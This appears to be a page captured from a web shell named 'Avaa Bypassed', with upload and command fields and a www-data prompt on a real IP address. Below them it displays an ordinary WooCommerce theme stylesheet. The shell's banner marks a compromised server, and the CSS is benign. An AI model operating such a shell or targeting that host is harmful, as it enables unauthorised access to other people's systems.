[ Avaa Bypassed ]




Upload:

Command:

www-data@18.221.35.244: ~ $
@charset "UTF-8";

.woocommerce #crumbs.woocommerce-breadcrumb > a:first-child::before {
	content: "\f015";
	display: inline-block;
	font: normal normal normal 14px/1 FontAwesome;
	font-size: 14px;
	font-size: inherit;
	text-rendering: auto;
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
	padding-right: 4px;
}

.woocommerce-mini-cart__buttons .button{
	margin: 0 5px;
}

.woocommerce ins {
	background: #fff9c0;
	text-decoration: none;
	padding: .202em .53em;
}
.product_title {
	margin-bottom: 20px;
	line-height: 25px;
}
ul.products {
	margin: 0;
	clear: both
}
ul.products:after {
	content: "";
	display: table;
	clear: both
}
ul.products li.product {
	list-style: none;
	margin-left: 0;
	margin-bottom: 4.236em;
	overflow: hidden;
	position: relative
}
ul.products li.product .price,
ul.products li.product .star-rating {
	margin: 10px 0
}
ul.products li.product .price {
	display: block;
	color: #787E87;
	font-weight: 400
}
ul.products li.product .price ins {
	font-weight: 700;
	margin-left: .618em;
	background-color: transparent
}
ul.products li.product img {
	display: block;
	width: 100%;
	margin: 0 auto 10px
}
ul.products li.product.product-category img {
	margin-bottom: 10px
}
ul.products li.product .button {
	margin-bottom: .236em
}
ul.products li.product .button.add_to_cart_button.loading {
	opacity: 0.8;
	background: #777;
}
ul.products li.product .button.added:after {
	font-family: 'FontAwesome';
	display: inline-block;
	font-size: 100%;
	margin-left: .618em;
	font-weight: normal;
	line-height: 1em;
	width: 1em;
	text-align: right;
	content: "\f00c";
}
ul.products li.product .button.loading:after {
	font-family: 'FontAwesome';
	display: inline-block;
	font-size: 100%;
	margin-left: .618em;
	font-weight: normal;
	line-height: 1em;
	width: 1em;
	text-align: right;
	content: "\f110";
	-webkit-animation: fa-spin 2s infinite linear;
			animation: fa-spin 2s infinite linear;
}
.single-product div.product {
	position: relative;
	overflow: hidden
}
.single-product div.product:after {
	content: "";
	display: table;
	clear: both
}
.single-product div.product .images,
.single-product div.product .summary {
	line-height: 18px;
	margin-bottom: 2.618em;
	margin-top: 0;
	clear:both;
}
.single-product div.product .images .woocommerce-main-image {
	margin-bottom: 10px;
	display: block
}
.single-product div.product .images .thumbnails a.zoom {
	display: block;
	width: 31.33333333333333%;
	margin-right: 3%;
	float: left;
	margin-bottom: 10px
}
.single-product div.product .images .thumbnails a.zoom.last {
	margin-right: 0
}
.single-product div.product .images .thumbnails a.zoom.first {
	clear: both
}
.single-product div.product form.cart {
	margin-bottom: 1.618em;
	padding: 1.618em 0;
	border-top: 3px solid rgba(0, 0, 0, .025);
	border-bottom: 3px solid rgba(0, 0, 0, .025)
}
.single-product div.product form.cart:after {
	content: "";
	display: table;
	clear: both
}
.single-product div.product form.cart .quantity {
	float: left;
}
.single-product div.product form.cart .button {
	float: right
}
.single-product div.product .price {
	font-weight: 700;
	font-size: 18px;
	margin-bottom: 15px;
}
.single-product div.product table.variations {
	margin: 0
}
.single-product div.product table.variations td,
.single-product div.product table.variations th {
	display: list-item;
	padding: 0;
	list-style: none;
	background-color: transparent
}
.single-product div.product table.variations .value {
	margin-bottom: 1em
}
.single-product div.product .single_variation .price {
	margin-bottom: 1em;
	display: block
}
.single-product div.product .variations_button {
	padding-top: 1em;
	border-top: 1px solid rgba(0, 0, 0, .1)
}
.single-product div.product .variations_button:after {
	content: "";
	display: table;
	clear: both
}
.single-product div.product .woocommerce-product-rating {
	margin-bottom: 20px;
	line-height: 1;
	border-bottom: 3px solid rgba(0, 0, 0, .025);
	padding: 0 0 10px;
}
.single-product div.product .woocommerce-product-rating:after {
	content: "";
	display: table;
	clear: both
}
.single-product div.product .woocommerce-product-rating a {
	font-size: .857em
}
.single-product div.product .woocommerce-product-rating .star-rating {
	float: right
}
.single-product div.product .product_meta .sku_wrapper,
.single-product div.product .product_meta .posted_in,
.single-product div.product .product_meta .tagged_as {
	clear: both;
	display: block;
	margin-bottom: 5px;
}
.single-product div.product p.stock:before {
	font-family: FontAwesome;
	margin-right: .53em
}
.single-product div.product p.stock.in-stock:before {
	content: "\f118"
}
.single-product div.product p.stock.out-of-stock:before {
	content: "\f119"
}
/* --------- */

.single-product div.product .woocommerce-product-gallery {
	position: relative
}
.single-product div.product .woocommerce-product-gallery .woocommerce-product-gallery__trigger {
	position: absolute;
	top: .875em;
	right: .875em;
	display: block;
	height: 2em;
	width: 2em;
	border-radius: 3px;
	z-index: 99;
	text-align: center;
	overflow: hidden;
	background: #333;
	color: #fff;
	line-height: 1.8;
}
.single-product div.product .woocommerce-product-gallery .woocommerce-product-gallery__trigger img {
	display: none!important
}
.single-product div.product .woocommerce-product-gallery img {
	margin: 0
}
.single-product div.product .woocommerce-product-gallery .flex-viewport {
	margin-bottom: 1.618em
}
.single-product div.product .woocommerce-product-gallery .flex-control-thumbs {
	margin: 0;
	padding: 0;
	position: relative;
	height: auto;
}
.single-product div.product .woocommerce-product-gallery .flex-control-thumbs:after,
.single-product div.product .woocommerce-product-gallery .flex-control-thumbs:before {
	content: "";
	display: table
}
.single-product div.product .woocommerce-product-gallery .flex-control-thumbs li {
	list-style: none;
	margin-bottom: 1.618em;
	cursor: pointer
}
.single-product div.product .woocommerce-product-gallery .flex-control-thumbs li img {
	opacity: .5;
	-webkit-transition: all, ease, .2s;
	-moz-transition: all, ease, .2s;
	transition: all, ease, .2s
}
.single-product div.product .woocommerce-product-gallery .flex-control-thumbs li img.flex-active,
.single-product div.product .woocommerce-product-gallery .flex-control-thumbs li:hover img {
	opacity: 1
}
.single-product div.product .woocommerce-product-gallery.woocommerce-product-gallery--columns-2 .flex-control-thumbs li {
	width: 42.8571428571%;
	float: left;
	margin-right: 14.2857142857%
}
.single-product div.product .woocommerce-product-gallery.woocommerce-product-gallery--columns-2 .flex-control-thumbs li:nth-child(2n) {
	margin-right: 0
}
.single-product div.product .woocommerce-product-gallery.woocommerce-product-gallery--columns-3 .flex-control-thumbs li {
	width: 23.8095238%;
	float: left;
	margin-right: 14.2857142857%
}
.single-product div.product .woocommerce-product-gallery.woocommerce-product-gallery--columns-3 .flex-control-thumbs li:nth-child(3n) {
	margin-right: 0
}
.single-product div.product .woocommerce-product-gallery.woocommerce-product-gallery--columns-4 .flex-control-thumbs li {
	width: 14.2857142857%;
	float: left;
	margin-right: 14.2857142857%
}
.single-product div.product .woocommerce-product-gallery.woocommerce-product-gallery--columns-4 .flex-control-thumbs li:nth-child(4n) {
	margin-right: 0
}
.single-product div.product .images .woocommerce-main-image {
	margin-bottom: 1.618em;
	display: block
}
.single-product div.product .images .thumbnails a.zoom {
	display: block;
	width: 22.05%;
	margin-right: 3.8%;
	float: left;
	margin-bottom: 1em
}
.single-product div.product .images .thumbnails a.zoom.last {
	margin-right: 0
}
.single-product div.product form.cart {
	margin-bottom: 1.618em;
	padding: 1em 0
}
.single-product div.product form.cart:after,
.single-product div.product form.cart:before {
	content: "";
	display: table
}



#reviews #comments {
	padding-top: 0
}
#reviews .commentlist {
	list-style: none;
	margin-left: 0
}
#reviews .commentlist li {
	border-bottom: 1px solid rgba(0, 0, 0, .1);
	list-style: none
}
#reviews .commentlist li time {
	opacity: .8
}
#reviews .commentlist li .avatar {
	float: right;
	width: 2.618em;
	height: auto
}
#reviews .commentlist li p.meta {
	margin-bottom: 1em
}
#reviews .commentlist li .description {
	padding-bottom: 1.618em
}
#reviews .commentlist li ul.children {
	border-top: 1px solid rgba(0, 0, 0, .1);
	width: 81.81818%;
	float: right;
	margin-right: 0;
	padding-top: 1.618em
}
#reviews .comment-form-author,
#reviews .comment-form-email {
	width: 48%
}
#reviews .comment-form-email {
	margin-right: 0
}
#reviews .comment-form-rating {
	clear: both
}
.woocommerce-pagination {
	padding: 1em 0;
	border: 1px solid rgba(0, 0, 0, .1);
	border-width: 1px 0;
	text-align: center
}
.woocommerce-pagination .page-numbers {
	list-style: none;
	margin: 0
}
.woocommerce-pagination .page-numbers:after {
	content: "";
	display: table;
	clear: both
}
.woocommerce-pagination .page-numbers li {
	display: inline-block
}
.woocommerce-pagination .page-numbers li .page-numbers {
	border-left-width: 0;
	display: inline-block;
	padding: .327em .857em
}
.woocommerce-pagination .page-numbers li .page-numbers.current {
	font-weight: 700;
	background-color: rgba(0, 0, 0, .0125)
}
.woocommerce-pagination .page-numbers li .page-numbers.dots {
	background-color: transparent
}
.woocommerce-pagination .page-numbers li .page-numbers.next,
.woocommerce-pagination .page-numbers li .page-numbers.prev {
	position: relative;
	padding-left: 1.387em;
	padding-right: 1.387em;
	font-size: 0;
}
.woocommerce-pagination .page-numbers li .page-numbers.next:before,
.woocommerce-pagination .page-numbers li .page-numbers.prev:before {
	content: "\f104";
	font-size: initial;
	padding: .327em .857em;
}
.woocommerce-pagination .page-numbers li .page-numbers.next:before {
	content: "\f105";
}
.woocommerce-pagination .page-numbers li a.page-numbers:hover {
	border-color: rgba(0, 0, 0, .1)
}
.product_list_widget {
	list-style: none;
	margin-left: 0
}
.product_list_widget li {
	padding: 1em 0;
	border-bottom: 1px dotted rgba(0, 0, 0, .1)
}
.product_list_widget li:after {
	content: "";
	display: table;
	clear: both
}
.product_list_widget li img {
	max-width: 60px;
	margin-right: 10px;
	float: left
}
.product_list_widget li .quantity {
	display: block;
	color: #aeb2b7
}
.widget_shopping_cart .product_list_widget {
	margin-bottom: 0
}
.widget_shopping_cart .product_list_widget li {
	padding-left: 2em;
	position: relative
}
.widget_shopping_cart .product_list_widget li a.remove {
	position: absolute;
	top: 1em;
	left: 0;
	opacity: 1
}
.widget_shopping_cart p.buttons,
.widget_shopping_cart p.total {
	padding: 1em 0;
	margin: 0;
	text-align: center
}
.widget_shopping_cart p.total {
	border-bottom: 1px solid rgba(0, 0, 0, .1)
}
.widget_product_categories ul {
	margin: 0
}
.widget_product_categories ul li {
	list-style: none;
	margin-bottom: .618em
}
.widget_product_categories .children {
	margin-top: .618em;
	margin-left: 1.618em
}
.site-header .widget_shopping_cart li,
.site-header .widget_shopping_cart p.buttons,
.site-header .widget_shopping_cart p.total {
	padding-left: 1.387em;
	padding-right: 1.387em;
	background-color: rgba(0, 0, 0, .025)
}
.widget_layered_nav li {
	margin-bottom: .618em
}
.widget_layered_nav .chosen:before {
	font-family: FontAwesome;
	content: "\f00d";
	margin-right: .53em;
	color: #e2401c
}
.widget.woocommerce li .count {
	font-size: 1em;
	float: right
}
.widget_price_filter .price_slider {
	margin-bottom: 1em
}
.widget_price_filter .price_slider_amount {
	text-align: right;
	line-height: 2.4em
}
.widget_price_filter .price_slider_amount .button {
	float: left
}
.widget_price_filter .ui-slider {
	position: relative;
	text-align: left
}
.widget_price_filter .ui-slider .ui-slider-handle {
	position: absolute;
	z-index: 2;
	width: 1em;
	height: 1em;
	border-radius: 1em;
	cursor: ew-resize;
	outline: 0;
	background: #F88C00;
	-webkit-box-sizing: border-box;
	-moz-box-sizing: border-box;
	box-sizing: border-box;
	margin-top: -.25em;
	opacity: 1
}
.widget_price_filter .ui-slider .ui-slider-handle:last-child {
	margin-left: -1em
}
.widget_price_filter .ui-slider .ui-slider-handle.ui-state-active,
.widget_price_filter .ui-slider .ui-slider-handle:hover {
	box-shadow: 0 0 0 .236em rgba(0, 0, 0, .1)
}
.widget_price_filter .ui-slider .ui-slider-range {
	position: absolute;
	z-index: 1;
	font-size: .7em;
	display: block;
	border: 0;
	background: #999;
	border-radius: 1em
}
.widget_price_filter .price_slider_wrapper .ui-widget-content {
	border-radius: 1em;
	background: rgba(0, 0, 0, .1)
}
.widget_price_filter .ui-slider-horizontal {
	height: .5em
}
.widget_price_filter .ui-slider-horizontal .ui-slider-range {
	top: 0;
	height: 100%
}
.widget_price_filter .ui-slider-horizontal .ui-slider-range-min {
	left: -1px
}
.widget_price_filter .ui-slider-horizontal .ui-slider-range-max {
	right: -1px
}
table.cart {
	margin-bottom: 3.631em
}
table.cart .product-quantity .minus,
table.cart .product-quantity .plus,
table.cart .product-thumbnail {
	display: none
}
table.cart td,
table.cart th {
	padding: .53em
}
table.cart .qty {
	padding: .236em;
	max-width: 1.618em
}
table.cart td.actions label {
	display: none
}
table.cart td.actions .coupon {
	padding-bottom: 1em;
	margin-bottom: 1em;
	border-bottom: 1px dotted rgba(0, 0, 0, .1)
}
table.cart td.actions input {
	display: block;
	width: 100%;
	margin: .236em 0
}
.wc-proceed-to-checkout {
	margin-bottom: 1.618em
}
.wc-proceed-to-checkout:after {
	content: "";
	display: table;
	clear: both
}
.wc-proceed-to-checkout .button {
	display: block;
	text-align: center;
	margin-bottom: 1em
}
.wc-proceed-to-checkout .button.checkout-button {
	font-size: 1.387em
}
ul#shipping_method {
	margin: 0;
	list-style: none
}
a.remove {
	display: block;
	width: 1.618em;
	height: 1.618em;
	line-height: 1.618;
	font-weight: 400;
	text-indent: -9999px;
	margin: 0 auto;
	position: relative
}
a.remove:before {
	content: "\f057";
	font-family: FontAwesome;
	position: absolute;
	top: 0;
	left: 0;
	right: 0;
	bottom: 0;
	color: #e2401c;
	line-height: 1.618;
	text-indent: 0;
	text-align: center;
	font-weight: 400
}
.checkout_coupon {
	margin-bottom: 2.618em
}
form.checkout:after {
	content: "";
	display: table;
	clear: both
}
#payment {
	border-top: 3px solid rgba(0, 0, 0, .1)
}
#payment:after {
	content: "";
	display: table;
	clear: both
}
#payment .create-account {
	clear: both
}
#payment .payment_methods {
	margin: 0!important;
	border-bottom: 1px dotted rgba(0, 0, 0, .1);
	padding: 0!important
}
#payment .payment_methods li {
	list-style: none!important;
	padding: 1.387em!important;
	border-bottom: 1px dotted rgba(0, 0, 0, .1);
	margin-left: 0
}
#payment .payment_methods li img {
	float: right;
	border: 0;
	padding: 0;
	max-height: 1.618em
}
#payment .payment_methods li:last-child {
	padding-bottom: 0;
	border-bottom: 0
}
#payment .payment_methods li label {
	width: 92%;
	padding-top: 0!important;
	margin-left: .618em;
	font-weight: 700
}
#payment .payment_methods li p {
	margin: 0
}
#payment .payment_methods li .payment_box {
	padding: 1.387em;
	margin: 1.387em -1.387em -1.387em;
	background: rgba(0, 0, 0, .035);
	border-top: 1px dotted rgba(0, 0, 0, .1)
}
#payment .payment_methods li .payment_box fieldset {
	border: 0;
	margin: 0;
	padding: 1em 0 0;
	font-size: .857em
}
#payment .payment_methods li .payment_box fieldset label {
	width: auto;
	margin-left: 0
}
#payment .payment_methods li .payment_box fieldset .form-row {
	margin-bottom: 1em
}
#payment .payment_methods li .payment_box fieldset .form-row-first select {
	width: 48%
}
#payment .payment_methods li .payment_box fieldset .form-row-first select:nth-child(2n) {
	float: right
}
#payment .payment_methods li .payment_box fieldset #cvv {
	width: 22%!important
}
#payment .payment_methods li .payment_box fieldset .help {
	width: 75%;
	float: right
}
#payment .terms {
	width: 100%;
	clear: both;
	float: none;
	margin-bottom: 0;
	margin-top: 1em
}
#payment .terms label {
	display: inline
}
#payment .terms input {
	display: inline-block;
	width: auto;
	float: left;
	margin: .327em .53em 0 0
}
#payment .place-order {
	padding: 1.387em;
	margin-bottom: 0;
	float: none;
	width: 100%
}
#payment .place-order .button {
	font-size: 1.387em;
	width: 100%
}
#customer_login .col-1 {
	padding-bottom: 1.618em;
	margin-bottom: 1.618em;
	border-bottom: 1px dotted rgba(0, 0, 0, .1)
}
ul.order_details {
	list-style: none;
	border: 1px solid rgba(0, 0, 0, .1);
	position: relative;
	margin-left: 0
}
ul.order_details:after {
	content: "";
	display: table;
	clear: both
}
ul.order_details li {
	float: left;
	padding: 1em 1.618em;
	border-right: 1px solid rgba(0, 0, 0, .1);
	font-size: .8em;
	text-transform: uppercase
}
ul.order_details li:last-child {
	border-right: 0
}
ul.order_details li strong {
	display: block;
	font-size: 1.387em;
	text-transform: none
}
ul.digital-downloads {
	list-style: none;
	margin-left: 0
}
ul.digital-downloads li {
	padding-bottom: 1em;
	margin-bottom: 1em;
	border-bottom: 1px dotted rgba(0, 0, 0, .1)
}
ul.digital-downloads li:before {
	font-family: FontAwesome;
	content: "\f019";
	margin-right: .53em
}
.my_account_orders .button {
	padding: .53em 1em;
	font-size: .857em
}
.form-row label {
	display: block
}
.form-row input,
.form-row textarea {
	width: 100%
}
.form-row .button,
.form-row input[type=checkbox],
.form-row input[type=radio] {
	width: auto
}
.form-row.create-account label {
	display: inline-block
}
.form-row.woocommerce-validated input.input-text {
	box-shadow: inset 2px 0 0 #17ba6f
}
.form-row.woocommerce-invalid input.input-text {
	box-shadow: inset 2px 0 0 #e2401c
}
.form-row-last {
	margin-right: 0!important
}
.form-row-wide {
	clear: both;
	width: 100%
}
.required {
	border-bottom: 0!important;
	color: red
}
.demo_store {
	position: fixed;
	left: 0;
	bottom: 0;
	right: 0;
	margin: 0;
	padding: 1em 1.387em;
	background-color: #3D9CD2;
	color: #fff
}
.demo_store:before {
	font-family: FontAwesome;
	margin-right: .53em;
	content: "\f05a"
}
.star-rating {
	overflow: hidden;
	position: relative;
	height: 1em;
	line-height: 1em;
	font-size: 1em;
	width: 4.64em;
	font-family: fontawesome;
	font-weight: 400
}
.star-rating:before {
	content: "\f005\f005\f005\f005\f005";
	float: left;
	top: 0;
	left: 0;
	position: absolute;
	color: rgba(0, 0, 0, .2)
}
.star-rating span {
	overflow: hidden;
	float: left;
	top: 0;
	left: 0;
	position: absolute;
	padding-top: 1.618em
}
.star-rating span:before {
	content: "\f005\f005\f005\f005\f005";
	top: 0;
	position: absolute;
	left: 0;
	color: #f0ce02
}
p.stars {
	position: relative;
	font-size: 1.618em
}
p.stars a {
	display: block;
	font-weight: 700;
	margin-right: 1em;
	text-indent: -9999px;
	position: relative;
	color: #787E87
}
p.stars a:hover {
	color: #f0ce02
}
p.stars a:last-child {
	border-right: 0
}
p.stars a.star-1:after,
p.stars a.star-2:after,
p.stars a.star-3:after,
p.stars a.star-4:after,
p.stars a.star-5:after {
	font-family: FontAwesome;
	text-indent: 0;
	position: absolute;
	top: 0;
	left: 0;
	padding-right: 1em
}
p.stars a.star-1 {
	width: 2em
}
p.stars a.star-1:after {
	content: "\f006"
}
p.stars a.star-1.active:after,
p.stars a.star-1:hover:after {
	content: ""
}
p.stars a.star-2 {
	width: 3em
}
p.stars a.star-2:after {
	content: "\f006\f006"
}
p.stars a.star-2.active:after,
p.stars a.star-2:hover:after {
	content: ""
}
p.stars a.star-3 {
	width: 4em
}
p.stars a.star-3:after {
	content: "\f006\f006\f006"
}
p.stars a.star-3.active:after,
p.stars a.star-3:hover:after {
	content: ""
}
p.stars a.star-4 {
	width: 5em
}
p.stars a.star-4:after {
	content: "\f006\f006\f006\f006"
}
p.stars a.star-4.active:after,
p.stars a.star-4:hover:after {
	content: ""
}
p.stars a.star-5 {
	width: 6em;
	border: 0
}
p.stars a.star-5:after {
	content: "\f006\f006\f006\f006\f006"
}
p.stars a.star-5.active:after,
p.stars a.star-5:hover:after {
	content: ""
}
.onsale {
	background-color: #F88C00;
	z-index: 1;
	padding: 6px 14px;
	position: absolute;
	top:  10px;
	left: 10px;
	font-size: 12pt;
	color: #FFF;
	-webkit-border-radius: 3px;
	   -moz-border-radius: 3px;
			border-radius: 3px;
}
ul.products .onsale {
	padding: 4px 10px;
	font-size: 10pt;
	top:  5px;
	left: 5px;
	-webkit-border-radius: 2px;
	   -moz-border-radius: 2px;
			border-radius: 2px;
}
ul.products li.product .product-img {
	position: relative;
}
ul.products li.product .product-img img,
.single-product div.product .images img:not(.zoomImg){
	opacity: 1 !important;
}
ul.products li.product .product-img img:hover,
.single-product div.product .images img:not(.zoomImg):hover{
	opacity: .7 !important;
}

/*ul.products li.product .product-img:after {
	content: '';
	position: absolute;
	bottom: 0;
	left: 10px;
	width: 0;
	height: 0;
	border: 10px solid #fff;
	border-color: transparent transparent #fff transparent;
}*/

.woocommerce .images img{
	width:100%;
}
.quantity input::-webkit-inner-spin-button,
.quantity input::-webkit-outer-spin-button {
	display: none
}
.quantity .qty {
	border: 1px solid #ccc;
	max-width: 3.631em;
	text-align: center;
	margin: 0 5px;
	-moz-appearance: textfield;
	float: left;
	height: 32px
}
.quantity .minus,
.quantity .plus {
	font-weight: 700;
	color: #FFF;
	border: 0 none;
	background-color: #777;
	box-shadow: none;
	width: 20px;
	height: 20px;
	float: left;
	-webkit-border-radius: 100%;
	-moz-border-radius:  100%;
	border-radius:  100%;
	line-height: 20px;
	padding: 0;
	margin-top: 5px;
}
.quantity .minus:hover,
.quantity .plus:hover {
	background-color: #F88C00;
}
.woocommerce-ordering,
.woocommerce-result-count {
	margin: .5em 0 1em
}
.woocommerce-result-count {
	padding-top: 5px;
}
.woocommerce-ordering .orderby {
	padding: 3px;
}
.woocommerce-tabs {
	border: 1px solid rgba(0, 0, 0, .1);
	border-width: 1px 0;
	padding: 1em 0
}
.woocommerce-tabs .entry-content{
	line-height: 19px;
}
.woocommerce-tabs .entry-content h2,
.woocommerce .related.products h2 {
	margin-bottom: 20px;
}
.woocommerce-tabs ul.tabs {
	list-style: none;
	margin-left: 0;
	padding-bottom: 35px;
	text-align: center
}
.woocommerce-tabs ul.tabs li {
	display: inline-block;
	margin-right: 1em;
	position: relative
}
.woocommerce-tabs ul.tabs li.active a {
	color: #787E87
}
.woocommerce-tabs ul.tabs li.active:after {
	content: "\f107";
	font-family: FontAwesome;
	position: absolute;
	top: 100%;
	left: 50%;
	height: 1em;
	width: 1em;
	line-height: 1;
	margin-left: -.5em
}
.shop_attributes {
	text-align: left;
}
.shop_attributes th {
	padding-right: 15px;
}
.woocommerce-error,
.woocommerce-info,
.woocommerce-message,
.woocommerce-noreviews,
p.no-comments {
	color: #666;
	background: #F7F7F7;
	padding: .5em 1.618em;
	margin-bottom: 2.618em;
	border-color: #17ba6f;
	border-style: solid;
	border-width: 0 0 0 5px;
	margin-left: 0;
	clear: both;
}
.woocommerce-error:after,
.woocommerce-info:after,
.woocommerce-message:after,
.woocommerce-noreviews:after,
p.no-comments:after {
	content: "";
	display: table;
	clear: both
}
.woocommerce-error a,
.woocommerce-info a,
.woocommerce-message a,
.woocommerce-noreviews a,
p.no-comments a{
	text-decoration: underline;
}
.woocommerce-error a.button:hover,
.woocommerce-info a.button:hover,
.woocommerce-message a.button:hover,
.woocommerce-noreviews a.button:hover,
p.no-comments a.button:hover {
	opacity: 1
}
.woocommerce-error .button,
.woocommerce-info .button,
.woocommerce-message .button,
.woocommerce-noreviews .button,
p.no-comments .button {
	float: right;
	padding: 0 0 0 1em;
	background: 0 0 !important;
	box-shadow: none;
	line-height: 1.618;
	border-width: 0 0 0 1px;
	border-left-style: solid;
	border-left-color: rgba(0, 0, 0, .25)!important;
	text-decoration: none;
	color: #666;
	border-radius: 0
}
.woocommerce-error .button:hover,
.woocommerce-info .button:hover,
.woocommerce-message .button:hover,
.woocommerce-noreviews .button:hover,
p.no-comments .button:hover {
	background: 0 0 !important;
	color: #000;
}
.added_to_cart {
	padding-left: 10px;
}
.woocommerce-error {
	list-style: none
}
.woocommerce-info,
.woocommerce-noreviews,
p.no-comments {
	border-color: #3D9CD2
}
.woocommerce-error {
	border-color: #e2401c
}
dl.variation {
	font-size: .857em
}
dl.variation dd {
	margin: 0 0 1em
}
.widget-container .star-rating {
	margin: 5px 0;
}
.widget_product_search form {
	font-size: 0;
}
.widget_product_search #s{
	width: 75%;
	margin-right: 2%;
	margin-bottom: 0;
}
.widget_product_search input#searchsubmit {
	width: 23%;
}
.woocommerce.widget_products a,
.woocommerce.widget_recently_viewed_products a,
.woocommerce.widget_recent_reviews a,
.woocommerce.widget_top_rated_products a{
	display: block;
	margin-bottom: 5px;
}


/* Dark
-------------------------------------------------- */
body.dark-skin.woocommerce ins {
	background: #1D1D1C;
}
body.dark-skin .woocommerce-error,
body.dark-skin .woocommerce-info,
body.dark-skin .woocommerce-message,
body.dark-skin .woocommerce-noreviews,
body.dark-skin p.no-comments,
body.dark-skin .chosen-container .chosen-results li.no-results{
	color: #D7D7D7;
	background: #343434;
}
body.dark-skin .chosen-container-single .chosen-single {
	background: -webkit-gradient(linear,50% 0,50% 100%,color-stop(20%,#444),color-stop(50%,#3a3a3a),color-stop(52%,#333),color-stop(100%,#444));
	background: -webkit-linear-gradient(top,#444 20%,#3a3a3a 50%,#333 52%,#444 100%);
	   background: -moz-linear-gradient(top,#444 20%,#3a3a3a 50%,#333 52%,#444 100%);
		 background: -o-linear-gradient(top,#444 20%,#3a3a3a 50%,#333 52%,#444 100%);
			background: linear-gradient(top,#444 20%,#3a3a3a 50%,#333 52%,#444 100%);
	box-shadow: 0 0 3px #333 inset,0 1px 1px rgba(0,0,0,.4);
	border-color: #5A5A5A;
	color: #FFF;
}
body.dark-skin .chosen-container .chosen-drop {
	border: 1px solid #5A5A5A;
	background: #333;
}
body.dark-skin .chosen-container-single .chosen-search input[type=text]{
	background-color: #FFF;
	color: #000 !important;
	webkit-transition: none;
	  -moz-transition: none;
	   -ms-transition: none;
		-o-transition: none;
		   transition: none;
}
body.dark-skin .woocommerce-error .button,
body.dark-skin .woocommerce-info .button,
body.dark-skin .woocommerce-message .button,
body.dark-skin .woocommerce-noreviews .button,
body.dark-skin p.no-comments .button {
	color: #999;
}


/* Responsive
-------------------------------------------------- */
@media screen and (min-width: 768px) {
	p.stars {
		font-size: 1em
	}
	p.stars a {
		display: inline-block
	}
	p.stars a.star-1,
	p.stars a.star-2,
	p.stars a.star-3,
	p.stars a.star-4 {
		border-right: 1px solid rgba(0, 0, 0, .1)
	}
	ul.products li.product {
		clear: none;
		float: left;
		width: 30.43478%;
		margin-right: 4.34783%
	}
	ul.products li.product.first {
		clear: both!important
	}
	ul.products li.product.last {
		margin-right: 0!important
	}
	.single-product div.product .images {
		width: 43.17647%;
		float: left;
		margin-right: 3.88235%;
		margin-bottom: 3.631em
	}
	.single-product div.product .images .thumbnails:after {
		content: "";
		display: table;
		clear: both
	}
	.single-product div.product .images .thumbnails a.zoom {
		width: 31.33333333333333%;
		float: left;
		margin-right: 3%
	}
	.single-product div.product .images .thumbnails a.zoom.last {
		margin-right: 0
	}
	.single-product div.product .summary {
		width: 52.94118%;
		float: right;
		margin-right: 0;
		margin-bottom: 3.631em;
		clear: none;
	}
	.single-product div.product .woocommerce-tabs {
		clear: both
	}
	.woocommerce .page-description {
		width: 64.70588%;
		float: left;
		margin-right: 5.88235%;
		margin-bottom: 1.618em
	}
	.woocommerce-result-count {
		float: left;
		position: relative;
		padding-bottom: 1em;
		clear: both
	}
	.woocommerce-ordering {
		float: right
	}
	table.cart td,
	table.cart th {
		padding: .857em 1.387em
	}
	table.cart .qty {
		padding: 0 .857em;
		max-width: 3.632em
	}
	table.cart .product-remove {
		display: table-cell
	}
	table.cart .product-quantity .minus,
	table.cart .product-quantity .plus {
		display: inline-block
	}
	table.cart .quantity {
		min-width: 9.505em
	}
	table.cart td.actions {
		text-align: right
	}
	table.cart td.actions label {
		display: none
	}
	table.cart td.actions .coupon {
		padding-bottom: 0;
		margin-bottom: 0;
		border-bottom: none;
		display: inline-block;
		float: left
	}
	table.cart td.actions input {
		display: inline-block;
		width: auto;
		margin: 0
	}
	.cart-collaterals:after {
		content: "";
		display: table;
		clear: both
	}
	.cart-collaterals .cross-sells {
		width: 41.17647%;
		float: left;
		margin-right: 5.88235%
	}
	.cart-collaterals .cross-sells ul.products li.product {
		width: 42.85714%;
		float: left;
		margin-right: 14.28571%
	}
	.cart-collaterals .cart_totals,
	.cart-collaterals .shipping_calculator {
		width: 52.94118%;
		float: right;
		margin: 0;
		clear: right
	}
	.cart-collaterals .shipping_calculator {
		clear: right
	}
	#customer_details {
		width: 52.94118%;
		float: left;
		margin-right: 5.88235%
	}
	#customer_details .form-row-first {
		width: 33.33333%;
		float: left;
		margin-right: 11.11111%
	}
	#customer_details .form-row-last {
		width: 55.55556%;
		float: right;
		margin-right: 0
	}
	#customer_details .col-1,
	#customer_details .col-2 {
		margin-bottom: 1.618em
	}
	#order_review,
	#order_review_heading {
		width: 41.17647%;
		float: right;
		margin-right: 0;
		border: 3px solid #F88C00;
		clear: none
	}
	#order_review_heading {
		margin-bottom: 0;
		padding: .618em 2.08333%;
		border-width: 3px 3px 0
	}
	#order_review {
		border-width: 0 3px 3px
	}
	#wc_checkout_add_ons {
		width: 41.17647%;
		float: left;
		margin-right: 5.88235%
	}
	#order_review .shop_table {
		margin-bottom: 2.618em
	}
	.form-row-first {
		width: 47.05882%;
		float: left;
		margin-right: 5.88235%;
		clear: both
	}
	.form-row-last {
		width: 47.05882%;
		float: right;
		margin-right: 0
	}
	.woocommerce-tabs {
		margin-bottom: 2.618em;
		padding-top: 2.618em;
		padding-bottom: 2.618em
	}
	.woocommerce-tabs:after {
		content: "";
		display: table;
		clear: both
	}
	.woocommerce-tabs ul.tabs {
		width: 29.41176%;
		float: left;
		margin-right: 5.88235%;
		text-align: left
	}
	.woocommerce-tabs ul.tabs li {
		display: block;
		margin: 0;
		border-bottom: 1px dotted rgba(0, 0, 0, .1)
	}
	.woocommerce-tabs ul.tabs li a {
		padding: 1em 0;
		display: block
	}
	.woocommerce-tabs ul.tabs li.active:after {
		margin: -.5em 0 0;
		right: 0;
		left: auto;
		top: 50%;
		content: "\f105"
	}
	.woocommerce-tabs .panel {
		width: 64.70588%;
		float: right;
		margin-right: 0;
		margin-top: 0
	}
}


/* RTL
-------------------------------------------------- */
body.rtl .price_label {
	text-align: left;
}
body.rtl ul.products li.product,
body.rtl .product_list_widget,
body.rtl ul.order_details {
	margin-right: 0;
}
body.rtl ul.products li.product .price ins,
body.rtl #payment .payment_methods li label {
	margin-left: 0;
	margin-right: .618em;
}
body.rtl ul.products li.product .button.added:after,
body.rtl ul.products li.product .button.loading:after {
	margin-left: 0;
	margin-right: .618em;
	text-align: left;
}
body.rtl.single-product div.product .images .thumbnails a.zoom {
	margin-right: 0;
	margin-left: 3%;
	float: right;
}
